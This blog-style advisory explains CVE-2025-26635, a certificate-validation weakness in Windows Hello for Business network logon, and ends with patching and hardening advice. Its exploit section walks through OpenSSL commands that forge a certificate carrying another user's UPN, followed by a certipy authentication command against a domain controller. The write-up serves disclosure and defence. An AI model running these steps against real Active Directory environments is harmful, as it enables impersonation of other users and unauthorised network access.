CVE-2025-26635 - Weak Authentication in Windows Hello – How an Attacker Can Bypass Security Over a Network

---

Summary:
CVE-2025-26635 exposes a critical weakness in Windows Hello’s network authentication. In this long read, we’ll break down what makes this vulnerability dangerous, explain how attackers can exploit it, go through some code examples, and share links to trusted resources for further reading. This is an exclusive, easy-to-understand guide for IT pros, security enthusiasts, and Windows users.

What Is CVE-2025-26635?

On April 2, 2025, Microsoft disclosed CVE-2025-26635, affecting Windows Hello, Microsoft’s biometric authentication feature (face, fingerprint, PIN). The flaw allows an attacker—who already has some level of access or is authorized—to bypass certain security features by exploiting weak authentication in the Windows Hello for Business network login out-of-the-box configuration.

Key Points

- Applies to: Windows 10/11 with Windows Hello for Business enabled

Preconditions: Attacker must be authorized (valid user credentials or access token)

- Impact: Attacker can bypass additional security protections and login as another user over the network

How the Vulnerability Works

Windows Hello uses certificate-based authentication for remote logins (like accessing files over SMB, RDP, etc.). However, in some configurations, Windows Hello for Business does not strictly validate all required certificate properties when authenticating users over the network.

If an attacker can obtain or forge a weak certificate that meets minimal requirements, they could "impersonate" a user and log in remotely—even bypassing facial recognition, PIN, or fingerprint checks.

Exploit Details – What an Attack Might Look Like

Suppose Alice uses Windows Hello to securely log into her work computer. Bob, an attacker who is a regular user on the same network, wants to log in as Alice over the network without knowing her PIN, password, or biometrics.

The Exploit Process

1. Obtain/Forge Weak Certificate
- Bob creates a certificate with Alice’s User Principal Name (UPN) in the Subject Alternative Name (SAN) field.

Authenticate Over the Network

- Bob leverages the weak network policy, using protocols like SMB, WinRM, or RDP, specifying the crafted certificate.

Bypass Windows Hello’s Strong Local Checks

- Since network authentication doesn't validate the cert chain and You are allowed via weak rules, Bob is in.

Here’s a basic snippet (NOT FOR MALICIOUS USE – educational only)

openssl req -new -newkey rsa:2048 -nodes -out malicious.csr -keyout malicious.key -subj "/CN=Alice User"

Create an OpenSSL config (san.cnf)

[req]
distinguished_name=req
req_extensions=v3_req
prompt=no

[v3_req]
subjectAltName=otherName:1.3.6.1.4.1.311.20.2.3;UTF8:AADalice@contoso.com

Then sign your CSR

openssl x509 -req -in malicious.csr -CA rootCA.pem -CAkey rootCA.key -out malicious.crt -days 365 -extfile san.cnf -extensions v3_req

Bob now has a fake "smartcard" certificate as Alice. With the right tooling (Rubeus, certipy, or pkinittools), he could now attempt to connect over the network.

Example Attack With Certipy

Certipy (GitHub) is a tool for abusing AD certificate services.

certipy auth -cert malicious.crt -key malicious.key -username alice@contoso.com -dc-ip 192.168.1.5

Patch All Windows Devices

- Always install the latest updates from Windows Update or Microsoft Update Guide.

Harden Certificate Validation

- Force strong validation of smartcard/certificates using group policy.
- Reference: Configure Windows Hello for Business certificate policies

References and Further Reading

- Microsoft - CVE-2025-26635 Advisory
- Windows Hello for Business Documentation
- Certipy (GitHub Tool)
- OpenSSL Documentation
- Harmjy - Cert Abuse in AD

Final Thoughts

CVE-2025-26635 highlights the real dangers of weak authentication, even in supposedly "secure" biometric systems like Windows Hello. While the exploit requires some user privileges and certificate/AD knowledge, it is highly effective on unpatched or poorly configured networks.

Always keep systems updated, review your certificate issuance processes, and monitor for suspicious activity related to certificates and smartcards.

Stay safe, stay patched!

*This post is exclusively written in plain English for readability and practical use — please share with your IT and security teams!*

Timeline

Published on: 04/08/2025 18:15:47 UTC
Last modified on: 06/04/2025 17:52:57 UTC